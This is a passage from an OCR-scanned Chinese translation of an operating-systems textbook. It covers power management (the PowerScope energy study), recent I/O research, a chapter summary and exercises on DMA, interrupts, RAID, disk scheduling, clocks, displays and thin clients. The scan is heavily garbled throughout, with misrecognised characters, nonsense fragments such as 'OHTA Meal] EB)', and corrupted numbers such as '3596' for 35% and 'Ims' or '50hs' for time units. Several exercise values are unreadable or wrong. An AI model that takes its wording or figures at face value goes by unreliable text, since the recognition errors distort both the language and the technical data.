ACPI 还 可 以 发 送 命令 给 驱动 程序 ， 命 令 它们 削减 其 功 耗 水 平 〈 当 
然 要 基于 早先 获悉 的 设备 性 能 ) 。 还 存在 某 些 其 他 方式 的 通信 。 特 别 
地 ， 当 一 个 设备 《例如 键盘 或 鼠标 ) 在 经 历 了 一 个 时 期 的 空闲 之 后 检测 
到 活动 时 ， 这 是 一 个 信号 让 系统 返回 到 接近) 正常 运转 。 


5.8.3 ”应 用 程序 问题 


到 目前 为 止 ， 我 们 了 解 了 操作 系统 能 够 降低 各 种 类 型 的 设备 的 
使 用 量 的 方法 。 但 是 ， 还 存在 着 另 一 种 方法 : 指示 程序 使 用 较 少 的 
量 ， 即 使 这 意味 着 提供 低劣 的 用 户 体 验 〈 低 劣 的 体验 也 比 电池 耗 干 并 且 
屏 划 煜 灭 时 没有 体验 要 好 ) 。 一 般 情况 下 ， 当 电池 的 电荷 低 于 茶 个 阐 值 
时 传递 这 样 的 信息 ， 然 后 由 应 用 程序 负责 在 退化 性 能 以 延长 电池 寿命 与 
维持 性 能 并 且 冒 着 用 光电 池 的 危险 之 间作 出 决定 。 
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这 里 出 现 的 一 个 问题 是 程序 怎样 退化 其 性 能 以 节省 能 量 ?Flinn 和 
Satyanarayanan (2004) 研究 了 这 一 问题 ， 他 们 提供 了 退化 的 性 能 怎样 
能 够 节省 能 量 的 4 个 例子 。 我 们 现在 束 看 一 看 这 些 例子 。 


在 他 们 的 研究 中 ， 信 息 以 各 种 形式 呈现 给 用 户 。 当 退化 不 存在 时 ， 
呈现 的 是 最 优 可 能 的 信息 。 当 退化 存在 时 ， 呈 现 给 用 户 的 信息 的 保 真 度 
(准确 度 〉 比 它 能 够 达到 的 保 真 度 要 差 。 我 们 很 快 束 会 看 到 这 样 的 例 
Te 


为 了 测量 能 量 使 用 量 ，Flinn 和 Satyanarayanan 发 明了 一 个 称 为 
PowerScope 的 软件 工具 。PowerScope 所 做 的 事情 是 提供 一 个 程序 的 电能 
使 用 量 的 概要 剖析 。 为 了 使 用 PowerScope， 计 算 机 必须 通过 一 个 软件 控 
制 的 数字 万 用 表 接 通 一 个 外 部 电源 。 使 用 万 用 表 ， 软 件 可 以 读 出 从 电源 


流 进 的 电流 的 坚 安 数 ， 并 且 因 此 确定 计算 机 正在 消耗 的 瞬时 功率 。 
PowerScope 所 做 的 工作 是 周期 性 地 采样 程序 计数 器 和 电能 使 用 量 并 且 将 
这 些 数据 写 到 一 个 文件 中 。 当 程序 终止 后 ， 对 文件 进行 分 析 就 可 以 给 出 
每 个 过 程 的 能 量 使 用 量 。 这 些 测量 形成 了 他 们 的 观 穴 结 果 的 基础 。 他 们 
还 利用 人 硬件 能 量 市 约 测 量 并 且 形 成 了 基准 线 ， 对 照 该 基准 线 测量 了 退化 
的 性 能 。 





汕 量 的 第 一 个 程序 是 一 个 视频 播放 器 。 在 未 退化 模式 下 ， 播 放 器 以 
全 分 辩 率 和 彩色 方式 每 秒 播放 30 帧 。 一 种 退化 形式 是 舍弃 彩色 信息 并 且 
以 黑白 方式 显示 视频 。 妃 一 种 退化 形式 是 降低 帧 速率 ， 这 会 导致 闪烁 并 
且 使 电影 呈现 抖动 的 质量 。 还 有 一 种 退化 形式 是 在 两 个 方向 上 减少 像素 
数目 ， 或 者 是 通过 降低 空间 分 辨 率 ， 或 者 是 使 显示 的 图 像 更 小 。 对 这 种 
类 型 的 测量 表明 节省 了 大 约 30% 的 能 量 。 




















第 二 个 程序 是 一 个 语音 识别 器 ， 它 对 麦克 风 进 行 采样 以 构造 波形 。 
该 波形 可 以 在 笔记 本 电脑 上 进行 分 析 ， 也 可 以 通过 无 线 链 路 发 送 到 固定 
计算 机 上 进行 分 析 ， 这 样 做 节省 了 CPU 消耗 的 能 量 但 是 会 为 无 线 电 设备 
而 消耗 能 量 。 通 过 使 用 比较 小 的 词汇 量 和 比较 简单 的 声学 模型 可 以 实现 
退化 ， 这 样 做 的 收益 大 约 是 35%。 








第 三 个 例子 是 一 个 通过 无 线 链 路 获取 地 图 的 地 图 观察 硕 。 退 化 在 于 
或 者 将 地 图 修 筋 到 比较 小 的 太 度 ， 或 者 告诉 远程 服务 器 省 略 比 较 小 的 道 
路 ， 从 而 需要 比较 少 的 位 来 传输 。 这 样 获得 的 收益 大 约 也 是 3596。 


第 四 个 实验 是 传送 JPEG 岁 像 到 一 个 Web 浏览 器 。JPEG 标 准 允 许 各 
种 算法 ， 在 图 像 质量 与 文件 大 小 之 间 进 行 中 。 这 里 的 收益 平均 只 有 
9%。 忆 而 言 之 ， 实 验 表 明 通 过 接受 一 些 质 量 退 化 ， 用 户 能 够 在 一 个 给 
定 的 电池 上 运行 更 长 的 时 间 。 


5.9 有关 输 入 /输出 的 研究 


关于 输入 /输出 有 大 量 的 研究 ， 但 是 大 多 数 研 究 集 中 在 特别 的 设备 
上 ， 而 不 是 一 般 性 的 VO。 研究 的 目标 常常 是 想方设法 改进 性 能 。 


磁盘 系统 是 一 个 恰当 的 事例 。 磁 盘 臂 调度 算法 曾经 是 一 个 流行 的 研 
KME (Bachmat 和 Braverman，2006; Zarandioon 和 Thomasim， 
2006) ， 磁 盘 阵 列 也 是 如 此 (Arnan 等 人 ，2007) 。 优 化 完整 的 MO 路 径 
也 引起 了 人 们 的 兴趣 〈Riska 等 人 ，2007) 。 还 有 关于 磁盘 工作 量 特性 
的 研究 〈Riska 和 Riedel，2006) 。 一 个 新 的 与 磁盘 相关 的 研究 领域 是 高 
性 能 闪存 盘 (Birrell 等 人 ，2007; Chang, 2007) 。 设 备 驱 动 程 序 也 得 
到 某 些 必要 的 关注 (Ball A, 2006; Ganapathy 等 人 ，2007; Padioleau 
等 人 ，2006) 。 








另 一 种 新 的 存储 技术 是 MEMS (Micro-Electrical-Mechanical 
System， 微 电子 机 械 系 统 ) ， 它 潜在 地 可 以 取代 磁盘 ， 或 者 至 少 是 磁盘 
的 补充 (Rangaswami 等 人 ，2007; Yu 等 人 ，2007) 。 另 一 个 新 兴 的 研 
究 领 域 是 如 何在 磁盘 控制 器 内 部 最 好 地 利用 CPU， 例 如 ， 为 了 改进 性 能 
(Gurumurthi, 2007) 或 者 是 为 了 检测 病毒 〈Paul 等 人 ，2005) 。 


稍稍 让 人 吃惊 的 是 ， 身 份 低下 的 时 钟 仍然 是 研究 的 主题 。 为 了 提供 
更 好 的 分 辨 率 ， 某 些 操作 系统 在 1000Hz 的 时 钟 下 运行 ， 这 会 导致 相当 大 





的 开销 。 摆 脱 这 一 开销 正 是 新 兴 的 研究 课题 (Etsion 等 人 ，2003; Tsafir 
等 人 ，2005) 。 


瘦 客 户 机 也 是 相当 引 人 注 目的 研究 主题 (Kissler 和 Hoyt，2005; 
Ritschard, 2006; Schwartz 和 Guerrazzi，2005) 。 


考虑 到 研究 笔记 本 电脑 的 为 数 众 多 的 计算 机 科学 家 ， 并 且 考 虑 到 大 
多 数 笔记 本 电脑 微不足道 的 电池 寿命 ， 看 到 在 利用 软件 技术 减少 电能 消 
耗 方面 有 巨大 的 研究 兴趣 就 不 足 为 奇 了 。 研 究 中 的 特别 主题 包括 : 编写 
应 用 程序 代码 以 最 大 化 磁盘 空闲 时 间 〈Son 等 人 ，2006) ， 当 使 用 比较 
少时 让 磁盘 降低 转速 《Gurumurthi 等 人 ，2003) ， 使 用 程序 模型 预测 无 
线 网 卡 何 时 可 以 关闭 (Hom#llKremer, 2003) ， 节 省 VoIP 的 电能 
(Gleeson A, 2006) ， 调 查 安全 性 的 能 量 代 价 〈Aaraj 等 人 ， 
2007) ， 以 能 源 效 率 高 的 方式 执行 多 媒体 调度 (Yuan 和 Nahrstedt， 
2006) ， 以 及 让 内 置 的 摄像 机 检测 是 否 有 人 在 看 显示 器 并 且 在 没有 人 看 
的 时 候 将 其 关闭 (Dalton 和 Ellis，2003〉。 在 低 端 ， 另 一 个 热门 话题 是 
传感器 网 络 中 能 源 的 使 用 (Min 等 人 ，2007; Wang 和 Xiao，2006) 。 而 
在 高 端 ， 在 大 型 服务 器 园区 中 节省 能 源 也 引起 人 们 的 关注 (Fan 等 人 ， 


2007;，Tolentino 等 人 ，2007) 。 





5.10 ”小 结 


输入 /输出 是 一 个 经 常 被 忽略 但 是 十 分 重要 的 话题 。 任 何 一 个 操作 
系统 都 有 大 量 的 组 分 与 JO 有 关 。LIO 可 以 用 三 种 方式 来 实现 。 第 一 是 程 
序 控 制 JO， 在 这 种 方式 下 主 CPU 输 入 或 输出 每 个 字 节 或 字 并 且 朵 置 在 
一 个 密封 的 循环 中 等 待 ， 直 到 它 能 够 获得 或 者 发 送 下 一 个 字 贡 或 字 。 第 
二 是 中 断 驱 动 的 DO， 在 这 种 方式 下 CPU 针对 一 个 字 节 或 字 开 始 UO 传 送 
并 且 离 开 去 做 别 的 事情 ， 直 到 一 个 中 断 到 来 发 出 信号 通知 WO 完成 。 第 
三 是 DMA， 在 这 种 方式 下 有 一 个 单独 的 芯片 管理 着 一 个 数据 块 的 完整 
传送 过 程 ， 只 有 当 整 个 数据 块 完 成 传送 时 才 引 发 一 个 中 断 。 





























IO 可 以 组 织 成 4 个 层次 : 中 断 服 务 程 序 、 设 备 驱 动 程序 、 与 设备 无 
天 的 IO 软件 和 运行 在 用 户 空间 的 MO 库 与 假 脱 机 程序 。 设 备 驱 动 程序 处 
理 运 行 设 备 的 细 贡 并 且 回 操作 系统 的 其 余部 分 提供 统一 的 接口 。 与 设备 
无 天 的 IO 软件 做 类 似 缓冲 与 错误 报告 这 样 的 事情 。 





盘 具 有 多 种 类 型 ， 包 括 磁盘 、RAID 和 各 类 光盘 。 磁 盘 臂 调度 算法 
经 常用 来 改进 磁盘 性 能 ， 但 是 虚拟 几何 规格 的 出 现 使 事情 变 得 十 分 复 
杂 。 通 过 将 两 块 磁盘 组 成 一 对 ， 可 以 构造 稳定 的 存储 介质 ， 具 有 茶 些 有 
用 的 性 质 。 














时 钟 可 以 用 于 跟踪 实际 时 间 ， 限 制 进程 可 以 运行 多 长 时 间 ， 处 理 监 
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面 问 字符 的 终端 具有 多 种 多 样 的 问题 ， 这 些 问 题 涉 及 特殊 的 字符 如 
何 输入 以 及 特殊 的 转 义 序列 如 何 输出 。 输 入 可 以 采用 原始 模式 或 加 工 模 
式 ， 取 决 于 程序 对 于 输入 需要 有 多 少 控制 。 针 对 输出 的 转 义 序列 控制 着 
光标 的 移动 并 且 允 许 在 屏幕 上 插入 和 删除 文本 。 





大 多 数 UNIX 系 统 使 用 X 窗 口 系统 作为 用 户 界 面 的 基础 。 它 包含 与 
特殊 的 库 相 绑 定 并 发 出 绘图 命令 的 程序 ， 以 及 在 显示 圳 上 执行 绘图 的 服 
BAe o 


许多 个 人 计算 机 使 用 GUI 作为 它们 的 输出 。GUI 基 于 WIMP 范 式 : 
窗口 、 图 标 、 菜 单 和 定点 设备 。 基 于 GUI 的 程序 一 般 是 事件 驱动 的 ， 当 
键盘 事件 、 鼠 标 事件 和 其 他 事件 发 生 时 立刻 会 被 发 送 给 程序 以 便 处 理 。 
在 UNIX 系 统 中 ，GUI 几 乎 总 是 运行 在 X 之 上 。 





瘦 客 户 机 与 标准 PC 相 比 具有 某 些 优势 ， 对 用 户 而 言 ， 值 得 注意 的 
是 简单 性 并 且 需 要 较 少 维护 。 对 THINC 瘦 客户 机 进行 的 实验 表明 ， 以 五 
条 简单 的 原 语 就 能 制造 出 具有 民 好 性 能 的 客户 机 ， 即 使 对 于 视频 也 是 如 
bs 








= 








最 后 ， 电 源 管理 对 于 笔记 本 电脑 来 说 是 一 个 主要 的 问题 ， 因 为 电池 
寿命 是 有 限 的 。 操 作 系 统 可 以 采用 各 种 技术 来 减少 功率 消耗 。 通 过 牺牲 
茶 些 质 量 以 换取 更 长 的 电池 寿命 ， 应 用 程序 也 可 以 做 出 页 献 。 


习题 


1. 必 片 技 术 的 进展 已 经 使 得 将 整个 控制 器 包括 所 有 总 线 访 问 馆 辑 放 
在 一 个 便宜 的 蕊 片上 成 为 可 能 。 这 对 于 图 1-5 的 模型 具有 什么 影响 ? 


2. 已 知 图 5-1 列 出 的 速度 ， 是 否 可 能 以 全 速 从 一 台 扫 描 仪 扫描 文档 并 
且 通 过 802.11g 网 络 对 其 进行 传输 ?请 解释 你 的 答案 。 


3. 图 5-3b 显 示 了 即使 在 存在 单独 的 总 线 用 于 内 存 和 用 于 IO 设备 的 情 
况 下 使 用 内 存 映 射 1O 的 一 种 方法 ， 也 就 是 说 ， 首 先 尝试 内 存 总 线 ， 如 
果 失 败 则 尝试 WO 总 线 。 一 名 聪明 的 计算 机 科学 专业 的 学 生 想 出 了 一 个 
改进 办 法 : 并 行 地 尝试 两 个 总 线 ， 以 加 快 访问 VO 设备 的 过 程 。 你 认为 


这 个 想法 如 何 ? 





4. 假 设 一 个 系统 使 用 DMA 将 数据 从 磁盘 控制 器 传送 到 内 存 。 进 一 步 
假设 平均 花费 ti ns 获得 总 线 ， 并 且 花 费 b ns 在 总 线 上 传送 一 个 字 (ti > 
>b ) 。 在 CPU 对 DMA 控 制 器 进行 编程 之 后 ， 如 果 (a) 采用 一 次 一 字 
ER b) 采用 突 发 模式 ， 从 磁盘 控制 器 到 内 存 传送 1000 个 字 需 要 多 
少时 间 ? 假设 向 磁盘 控制 器 发 送 命令 需要 获取 总 线 以 传输 一 个 字 ， 并 且 


应 答 传输 也 需要 获取 总 线 以 传输 一 个 字 。 


5. 假 设 一 台 计 算 机 能 够 在 10ns 内 读 或 者 写 一 个 内 存 字 ， 并 且 假 设 当 
中 断 发 生 时 ， 所 有 32 位 寄存 器 连同 程序 计数 器 和 PSW 被 压 入 堆栈 。 该 计 


算 机 每 秒 能 够 处 理 的 中 断 的 最 大 数目 是 多 少 ? 


6.CPU 体 系 结构 设计 师 知 道 操 作 系 统 编写 者 痛恨 不 精确 的 中 断 。 取 
悦 于 OS 人 和 群 的 一 种 方法 是 当 得 到 一 个 中 断 信号 通知 时 ， 让 CPU 停止 发 
射 指令 ， 但 是 允许 当前 正在 执行 的 指令 完成 ， 然 后 强制 中 断 。 这 一 方案 


是 否 有 缺点 ?请 解释 你 的 答案 。 


7. 在 图 5-9b 中 ， 中 断 直 到 下 一 个 字符 输出 到 打印 机 之 后 才 得 到 应 
答 。 中 断 在 中 断 服务 程序 开始 时 立刻 得 到 应 答 是 否 同样 可 行 ?如 果 是 ， 
请 给 出 像 本 书 中 那样 在 中 断 服 务 程序 结束 时 应 答 中 断 的 一 个 理由 。 如 果 
不 是 ， 为 什么 ? 











8. 一 全 计算 机 具有 如 图 1-6a 所 示 的 三 阶段 流水 线 。 在 每 一 个 时 钟 周 
期 ， 一 条 新 的 指令 从 PC 所 指向 的 地 址 处 的 内 存 中 取出 并 放 入 流水 线 ， 
同时 PC 值 增加 。 每 条 指令 恰好 占据 一 个 内 存 字 。 已 经 在 流水 线 中 的 指 
令 每 个 时 钟 周期 前 进 一 个 阶段 。 当 中 断 发 生 时 ， 当 前 PC 压 入 堆栈 ， 并 
且 将 PC 设置 为 中 断 处 理 程序 的 地 址 。 然 后 ， 流 水 线 右 移 一 个 阶段 并 且 
中 断 处 理 程序 的 第 一 条 指令 和 被 取 入 流水 线 。 该 机 妖 具 有 精确 的 中 断 吗 ?” 


请 解释 你 的 答案 。 


9. 一 个 典型 的 文本 打印 页 面包 含 50 行 ， 每 行 80 个 字符 。 设 想 某 一 台 
打印 机 每 分 钟 可 以 打印 6 个 页 面 ， 并 且 将 字符 写 到 打印 机 输出 寄存 器 的 
时 间 很 短 以 至 于 可 以 忽略 。 如 果 打 印 每 一 个 字符 要 请 求 一 次 中 断 ， 而 进 





行 中 断 服务 要 花费 总 计 50hs 的 时 间 ， 那 么 使 用 中 断 驱动 的 VO 来 运行 该 
打印 机 有 没有 意义 ? 








10. 请 解释 OS 如 何 帮 助 安装 新 的 驱动 程序 而 无 须 重新 编译 OS。 
11. 以 下 各 项 工作 是 在 四 个 IO 软件 层 的 哪 一 层 完成 的 ? 

a) 为 一 个 磁盘 读 操 作 计算 磁道 、 记 区、 磁头 。 

b) 向 设备 寄存 器 写 命令 

QO 检查 用 户 是 否 允 许 使 用 设备 。 

d) 将 二 进 制 整数 转换 成 ASCII 码 以 便 打印 。 


12. 一 个 局 域 网 以 如 下 方式 使 用 : 用 户 发 出 一 个 系统 调用 ， 请 求 将 
数据 包 写 到 网 上 ， 然 后 操作 系统 将 数据 复制 到 一 个 内 核 缓冲 区 中 ， 再 将 
数据 复制 到 网 络 控制 器 接口 板 上 。 当 所 有 数据 都 安全 地 存放 在 控制 器 中 
时 ， 再 将 它们 通过 网 络 以 10Mb/s 的 速率 发 送 。 在 每 一 位 被 发 送 后 ， 接 收 
的 网 络 控制 器 以 每 微 秒 一 位 的 速率 保存 它们 。 当 最 后 一 位 到 达 时 ， 目 标 
CPU 被 中 断 ， 内 核 将 新 到 达 的 数据 包 复 制 到 内 核 缓 冲 区 中 进行 检查 。 一 - 
且 判 明 该 数据 包 是 发 送 给 哪个 用 户 的 ， 内 核 就 将 数据 复制 到 该 用 户 空 
间 。 如 果 我 们 假设 每 一 个 中 断 及 其 相关 的 处 理 过 程 花 费 Ims 时 间 ， 数 据 
包 为 1024 字 节 〈 忽 略 包 头 ) ， 并 且 复 制 一 个 字 节 花费 1hs 时 间 ， 那 么 将 
数据 从 一 个 进程 转 储 到 另 一 个 进程 的 最 大 速率 是 多 少 ?假设 发 送 进程 被 





阻 竖 直到 接收 端 结束 工作 并 且 返 回 一 个 应 答 。 为 简单 起 见 ， 假 设 获得 返 
回应 答 的 时 间 非 常 短 ， 可 以 忽略 不 计 。 


13. 为 什么 打印 机 的 输出 文件 在 打印 前 通常 都 假 脱 机 输出 在 磁盘 上 ? 





14.3 级 RAID 只 使 用 一 个 奇偶 驱动 器 就 能 够 纠正 一 位 错误 。 那 么 2 级 
RAID 的 意义 是 什么 ?毕竟 2 级 RAID 也 只 能 纠正 一 位 错误 而 且 需 要 更 多 的 
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15. 如 果 两 个 或 更 多 的 驱动 器 在 很 短 的 时 间 内 崩 尝 ， 那 么 RAID 就 可 
能 失效 。 假 设 在 给 定 的 一 小 时 内 一 个 驱动 右 朋 尝 的 概率 是 p， 那 么 在 给 
定 的 一 小 时 内 具有 k 个 驱动 器 的 RAID 失 效 的 概率 是 多 少 ? 

16. 从 读 性 能 、 写 性 能 、 空 间 开 销 以 及 可 靠 性 方面 对 0 级 RAID 到 5 级 
RAID 进 行 比较 。 

17. 为 什么 光 存 储 设备 天 生地 比 磁 存储 设备 具有 更 高 的 数据 密度 ? 注 
意 : 本 题 需 要 某 些 高 中 物理 以 及 磁场 是 如 何 产生 的 知识 。 

18. 光 租 和 磁盘 的 优点 和 缺点 各 是 什么 ? 


19. 如 条 一 个 磁盘 控制 器 没有 内 部 缓冲 ， 一 旦 从 磁盘 上 接收 到 字 节 
就 将 它们 写 到 内 存 中 ， 那 么 交错 编号 还 有 用 吗 ?请 讨论 。 











20. 如 条 一 个 磁盘 是 双 交 错 编 号 的 ， 那 么 该 磁盘 是 否 还 需要 柱 面 斜 





进 以 避免 在 进行 磁道 到 磁道 的 寻 道 时 错过 数据 ? 请 讨论 你 的 答案 。 


21. 考 虑 一 个 包含 16 个 磁头 和 400 个 柱 面 的 磁盘 。 该 磁盘 分 成 4 个 100 
柱 面 的 区 域 ， 不 同 的 区 域 分 别 包含 160 个 、200 个 、240 个 和 280 个 耐 区 。 
假设 每 个 肩 区 包含 512 字 节 ， 相 邻 柱 面 间 的 平均 寻 道 时 间 为 1ms， 并 且 磁 
盘 转 速 为 7200rpm。 计 算 a) 磁 盘 容 量 、b) 最 优 磁道 斜 进 以 及 中 最 大 数据 传 
WE o 








22. 一 个 磁盘 制造 商 拥有 两 种 5.25 英 寸 的 磁盘 ， 每 种 磁盘 都 具有 10 
000 个 柱 面 。 新 磁盘 的 线性 记录 密度 是 老 磁 盘 的 两 倍 。 在 较 新 的 驱动 右 
上 哪个 磁盘 的 特性 更 好 ， 哪 个 无 变化 ? 





23. 一 个 计算 机 制造 商 决定 重新 设计 Pentium 便 盘 的 分 区 表 以 提供 四 
个 以 上 的 分 区 。 这 一 变化 有 什么 后 果 ? 


24. 磁 盘 请 求 以 柱 面 10、22、20、2、40、6 和 38 的 次 序 进 入 磁盘 驱 
动 器 。 寻 道 时 每 个 柱 面 移动 需要 6ms， 以 下 各 算法 所 需 的 寻 道 时 间 是 多 


少 ? 


a) 先 来 先 服 务 。 


b) 最 近 柱 面 优先 。 


OHTA Meal] EB) - 


在 各 情形 下 ， 假 设 磁 辟 起 始 于 柱 面 20。 


25. 调 度 磁盘 请 求 的 电梯 算法 的 一 个 微小 更 改 是 总 是 沿 相同 的 方 同 
扫描 。 在 什么 方面 这 一 更 改 的 算法 优 于 电梯 算法 ? 


26. 在 讨论 使 用 非 易 失 性 RAM 的 稳定 的 存储 器 时 ， 掩 饰 了 如 下 要 
上 把。 如 果 稳定 写 完 成 但 是 在 操作 系统 能 够 将 无 效 的 块 编写 写 入 非 易 失 性 
RAM 之 前 发 生 了 朋 浊 ， 那 么 会 有 什么 结果 ?这 一 竞争 条 件 会 毁灭 稳定 的 
存储 器 的 抽象 概念 吗 ? 请 解释 你 的 答案 。 








27. 在 关于 稳定 的 存储 器 的 讨论 中 ， 证 明了 如 果 在 写 过 程 中 发 生 了 
CPU 册 沉 ， 人 磁盘 可 以 恢复 到 一 个 一 致 的 状态 ( 写 操 作 或 者 已 完成 ， 或 者 
完全 没有 发 生 ) 。 如 末 在 恢复 的 过 程 中 CPU 再 次 崩 尝 ， 这 一 特性 是 否 还 


保持 ?请 解释 你 的 答案 。 





28. 菏 计算 机 上 的 时 钟 中 断 处 理 程 序 每 一 时 钟 滴答 需要 2ms (包括 进 
程 切换 的 开销 ) ， 时 钟 以 60Hz 的 频率 运行 ， 那 么 CPU 用 于 时 钟 处 理 的 时 
间 比 例 是 多 少 ? 


29. 一 台 计 算 机 以 方 波 模式 使 用 一 个 可 编程 时 钟 。 如 果 使 用 500MHz 
的 晶体 ， 为 了 达到 如 下 时 钟 分 辨 率 ， 存 储 寄存 器 的 值 应 该 是 多 少 ” 





al1ms《〈 每 曼 秒 一 个 时 钟 滴答 ) 。 


b)100hs. 


30. 一 个 系统 通过 将 所 有 未 决 的 时 钟 请求 链 接 在 一 起 而 模拟 多 个 时 
钟 ， 如 图 5-34 所 示 。 假 设 当前 时 刻 是 5000， 并 且 存 在 针对 时 刻 5008、 
5012、5015、5029 和 5037 的 未 决 的 时 钟 请 求 。 请 指出 在 时 刻 5000、5005 
和 5013 时 时 钟头 、 当 前 时 刻 以 及 下 一 信号 的 值 。 请 指出 在 时 刻 23 时 时 钟 
头 、 当 前 时 刻 以 及 下 一 信号 的 值 。 





31. 许 多 UNIX 版 本 使 用 一 个 32 位 无 符号 整数 作为 从 时 间 原 点 计算 的 
秒 数 来 跟踪 时 间 。 这 些 系统 什么 时 候 会 溢出 《年 与 月 ) ? 你 盼望 这 样 的 
事情 实际 发 生 吗 ? 


32. 一 个 位 图 模式 的 终端 包含 1280x960 个 像素 。 为 了 滚动 一 个 窗 
O, CPU 〈 或 者 控制 器 ) 必须 向 上 移动 所 有 的 文本 行 ， 这 是 通过 将 文本 
行 的 所 有 位 从 视频 RAM 的 一 部 分 复制 到 另 一 部 分 实现 的 。 如 果 一 个 特 
殊 的 窗口 高 60 行 宽 80 个 字符 〈 总 共 4800 个 字符 ) ， 每 个 字符 框 宽 8 个 像 
素 高 16 像 素 ， 那 么 以 每 个 字 节 50ns 的 复制 速率 滚动 整个 窗口 需要 多 长 时 
间 ? 如 果 所 有 的 行 都 是 80 个 字符 长 ， 那 么 终端 的 等 价 波 特 率 是 多 少 ?将 一 


个 字符 显示 在 屏幕 上 需要 5hs， 每 秒 能 够 显示 多 少 行 ? 


























33. 接 收 到 一 个 DEL (SIGINT) 字符 之 后 ， 显 示 驱 动 程 序 将 丢弃 当 
前 排队 等 候 显示 的 所 有 输出 。 为 什么 ? 





34. 在 最 初 IJBM PC 的 彩色 显示 器 上 ， 在 除了 CRT 电 子 束 垂 直 回 扫 期 
间 以 外 的 任何 时 间 回 视频 RAM 中 写 数据 都 会 导致 屏幕 上 出 现 难看 的 斑 


扩 。 一 个 屏 硕 映像 为 25x80 个 字符 ， 每 个 字符 占据 8x8 像 系 的 方 框 。 每 行 
640 像 素 在 电子 束 的 一 次 水 平 扫描 中 绘 出 ， 需 要 人 花费 6hs， 包 括 水 平 回 
扫 。 屏 医 每 秒 钟 刷新 60 次 ， 每 次 刷新 均 需 要 一 个 牌 直 回 扫 期 以 便 使 电子 
束 回 到 屏幕 顶 并 。 在 这 一 过 程 中 可 供 写 视频 RAM 的 时 间 比 例 是 多 少 ? 











35. 计 算 机 系统 的 设计 人 员 期 望 鼠 标 移动 的 最 大 速率 为 20cm/s。 如 果 
一 个 鼠标 步 是 0.Imm， 并 且 每 个 鼠标 消息 3 个 字 节 ， 假 设 每 个 鼠标 步 都 


是 单独 报告 的 ， 那 么 鼠标 的 最 大 数据 传输 率 是 多 少 ? 


36. 基 本 的 加 性 颜色 是 红色 、 绿 色 和 蓝 色 ， 这 意味 着 任何 颜色 都 可 
以 通过 这 些 颜色 的 线性 县 加 而 构造 出 来 。 某 人 拥有 一 张 不 能 使 用 全 24 位 
颜色 表示 的 彩色 照片 ， 这 可 能 吗 ? 





37. 将 字符 放置 在 位 图 模式 的 屏幕 上 ， 一 种 方法 是 使 用 BitBlt 从 一 个 
字体 表 复 制 位 图 。 假 设 一 种 特殊 的 字体 使 用 16x24 像 素 的 字符 ， 并 且 采 
用 RGB 真 彩 色 











(a) 每 个 字符 占用 多 少 字 体 表 空 间 ? 


(b) 如 果 复 制 一 个 字 节 花费 100ns (包括 系统 开销 ) ， 那 么 到 屏幕 的 


输出 率 是 每 秒 多 少 个 字符 ? 





38. 假 设 复 制 一 个 字 节 花费 10ns， 那 么 对 于 80 字 符 x25 行 文本 模式 的 
内 存 映射 的 屏幕 ， 完 全 重 写 屏 幕 要 花费 多 长 时 间 ? 采用 24 位 彩色 的 











1024x768 像 素 的 图 形 屏 幕 情况 怎样 ? 


39. 在 图 5-4 0 中 存在 一 个 窗口 类 需要 调用 RegisterClass 进 行 注 册 ， 在 
图 5-38 中 对 应 的 X 窗 口 代码 中 ， 并 不 存在 这 样 的 调用 或 与 此 相似 的 任何 
调用 。 为 什么 ? 





40. 在 课文 中 我 们 给 出 了 一 个 如 何在 屏幕 上 男 一 个 矩形 的 例子 ， 即 
使 用 Windows GDI: 





Rectangle (hdc, xleft, ytop, xright, ybottom) ; 





是 否 存在 对 于 第 一 个 参数 Chde) 的 实际 需要 ? 如 果 存 在 ， 是 什 
A? 毕竟， 矩形 的 坐标 作为 参数 而 显 式 地 指明 了 。 


41. 一 台 THINC 终 端 用 于 显示 一 个 网 页 ， 该 网 页 包含 一 个 动画 卡 
通 ， 卡 通 大 小 为 400x160 像 素 ， 以 每 秒 10 帧 的 速度 播放 。 显 示 该 卡通 会 
消耗 100Mbps 决 速 以 太 网 带宽 多 大 的 部 分 ? 





42. 在 一 次 测试 中 ，THINC 系 统 被 观测 到 对 于 1Mbps 的 网 络 工作 民 
好 。 在 多 用 户 的 情形 中 会 有 问题 吗 ? 提示 : 考虑 大 量 的 用 户 在 观看 时 间 
表 排 好 的 TV 节目 ， 并 且 相 同 数目 的 用 户 在 浏览 万 维 网 。 








43. 如 果 一 个 CPU 的 最 大 电压 V 被 削减 到 Van， 那 么 它 的 功率 消耗 将 
下 降 到 其 原始 值 的 Vn* ， 并 且 它 的 时 钟 速度 下 降 到 其 原始 值 的 yn。 假 设 


一 个 用 户 以 每 秒 1 个 字符 的 速度 键入 字符 ， 处 理 每 个 字符 所 需要 的 CPU 
时 间 是 100ms，n 的 最 优 值 是 多 少 ? 与 不 削减 电压 相 比 ， 以 百分比 表示 相 
应 的 能 量 市 约 了 多 少 ? 假设 空闲 的 CPU 完全 不 消耗 能 量 。 


44. 一 台 笔 记 本 电脑 被 设置 成 最 大 地 利用 功率 市 省 特性 ， 包 括 在 一 
段 时 间 不 活动 之 后 关闭 显示 器 和 硬盘 。 一 个 用 户 有 时 在 文本 模式 下 运行 
UNIX 程 序 ， 而 在 其 他 时 间 使 用 X 窗 口 系 统 。 她 惊讶 地 发 现 当 她 使 用 仪 
限 文本 模式 的 程序 时 ， 电 池 的 寿命 相当 长 。 为 什么 ? 








45. 编 写 一 个 程序 模拟 稳定 的 存储 器 ， 在 你 的 磁盘 上 使 用 两 个 大 型 
的 固定 长 度 的 文件 来 模拟 两 块 磁盘 。 


46. 编 写 一 个 程序 实现 三 个 磁盘 臂 调度 算法 。 编 写 一 个 驱动 程序 随 
机 生成 一 个 柱 面 号 序列 〈0 一 999) ， 针 对 该 序列 运行 三 个 算法 并 且 打 印 
出 在 三 个 算法 中 磁盘 臂 需要 来 回 移 动 的 总 距离 〈 柱 面 数 ) 。 








47. 编 写 一 个 程序 使 用 单一 的 时 钟 实 现 多 个 定时 器 。 该 程序 的 输入 
包含 四 种 命令 (S<int>,T,E<int>,P) 的 序列 : S<int> 设 置 当 前 时 刻 
为 <int>，T 是 一 个 时 钟 滴答 ， E<int> 调 度 一 个 信号 在 <<int 盖 时 刻 发 
生 ;，P 打 印 出 当前 时 刻 、 下 一 信号 和 时 钟头 的 值 。 当 唤起 一 个 信号 时 ， 
你 的 程序 还 应 该 打印 出 一 条 语句 。 
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在 计算 机 系统 中 有 很 多 独占 性 的 资源 ， 在 任 一 时 刻 它 们 都 只 能 被 一 
个 进程 使 用 。 常 见 的 有 打印 机 、 磁 带 以 及 系统 内 部 表 中 的 表 项 。 打 印 机 
